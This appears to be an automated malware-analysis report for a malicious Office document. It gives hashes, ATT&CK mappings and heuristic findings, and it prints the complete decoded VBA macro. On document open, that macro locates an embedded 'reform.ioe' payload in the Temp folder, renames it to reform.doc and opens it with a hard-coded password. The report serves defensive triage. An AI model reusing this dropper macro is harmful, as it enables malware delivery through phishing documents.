Office (OLE) malware analysis — malicious · d251173f3e097f27

MALICIOUS

Office (OLE)

489.0 KB Created: 2021-09-13 11:39:00 First seen: 2021-09-17

MD5: 5d85f70c370ba3acd4f197e85fff509a SHA-1: 207f0e19c07ca323869ecec364f04e406a6f2cf5 SHA-256: d251173f3e097f27be003fe8b061573f20ebead4c07062ae9825382f56da59b6

72 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro that executes upon opening. The macro attempts to save a file named 'reform.doc' with a password and then opens it, suggesting it's a downloader for a second-stage payload. The presence of the Document_Open macro and the OLE_EPRINT_EMF_OBJECT heuristic indicate a common pattern for macro-based malware delivery.

Heuristics 5

Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT

OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/2006/encryption In document text (OLE body)
- http://schemas.microsoft.com/office/2006/keyEncryptor/passwordIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/keyEncryptor/certificateIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2917 bytes
SHA-256: `6545c017c951dc2c50da94f34055cd666f82c1c4c6fbd7a20a63bfd0cefad56c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit Option Compare Text Dim hdv As String Dim bbbb As String Dim med As String Private Sub Document_Open() Dim dfgdgdg Dim kytrewwf As String kytrewwf = Options.DefaultFilePath(wdUserTemplatesPath) If Dir(kytrewwf & "\" & "reform.doc") = "" Then Selection.MoveDown Unit:=wdLine, Count:=3 Selection.MoveRight Unit:=wdCharacter, Count:=2 Selection.MoveDown Unit:=wdLine, Count:=3 Selection.MoveRight Unit:=wdCharacter, Count:=2 Selection.TypeBackspace Call bvxfcsd If Len(hdv) > 2 Then Call nam(hdv, kytrewwf) Call pppx(kytrewwf & "\" & "reform.doc") ActiveDocument.Close End If End If End Sub Sub hdhdd(asda As String) Dim MyFSO As FileSystemObject Dim MyFile As File Dim SourceFolder As String Dim DestinationFolder As String Dim MyFolder As Folder Dim MySubFolder As Folder Set MyFSO = New Scripting.FileSystemObject Call Search(MyFSO.GetFolder(asda), hdv) End Sub Attribute VB_Name = "Module1" Sub pppx(spoc As String) Documents.Open FileName:=spoc, ConfirmConversions:=False, ReadOnly:= _ False, AddToRecentFiles:=False, PasswordDocument:="2281337", _ PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _ WritePasswordTemplate:="", Format:=wdOpenFormatAuto, XMLTransform:="" End Sub Sub ousx(aaaa As String) Call uoia(aaaa) End Sub Attribute VB_Name = "Module3" Sub bvxfcsd() Selection.Copy Dim uuuuc uuuuc = Options.DefaultFilePath(wdUserTemplatesPath) ntgs = 50 sda = 49 Dim fafaa As String fafaa = "L" & "o" fafaa = fafaa & "c" & "a" & "l" fafaa = fafaa & "/" fafaa = fafaa & "T" & "e" & "mp" Dim kuls As String kuls = fafaa While sda < 50 ntgs = ntgs - 1 If Dir(Left(uuuuc, ntgs) & kuls, vbDirectory) = "" Then Else sda = 61 End If Wend Call ThisDocument.hdhdd(Left(uuuuc, ntgs) & fafaa) End Sub Attribute VB_Name = "Module123345" Dim pls As String Sub Search(mds As Object, pafs As String) Dim Nedc As Object Dim Ters As Object Dim fffff fffff = "reform.ioe" For Each Nedc In mds.SubFolders Search Nedc, pafs Next Nedc For Each Ters In mds.Files If Ters.Name = fffff Then pafs = Ters End If Next Ters Exit Sub ErrHandle: Err.Clear End Sub Sub nam(pafs As String, aaaa As String) Call ousx(aaaa) Dim oxl oxl = "\reform" & ".doc" Name pafs As pls & oxl End Sub Sub uoia(fffs As String) pls = fffs End Sub
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1693007205/Ole10Native	326465 bytes
SHA-256: `854e3e07beb6bb9c21bff74ccccef6848bd93e50e82799e8e3234a4dbe40afc4`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact entropy is 7.98, consistent with packed or encrypted content.
`ole10native_00_reform.ioe`	ole-package-payload	OLE Ole10Native payload: ObjectPool/_1693007205/Ole10Native; display_name=reform.ioe; full_path=C:\Users\MyPc\AppData\Local\Temp\reform.ioe; temp_path=; def_file=	326144 bytes
SHA-256: `d598cd665b575f4bb58ab4fbab70540c6e9c8c9d03c0764ad16a697441fb85fc`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact entropy is 7.98, consistent with packed or encrypted content.

Open this report in the interactive analyzer, or submit your own file for analysis.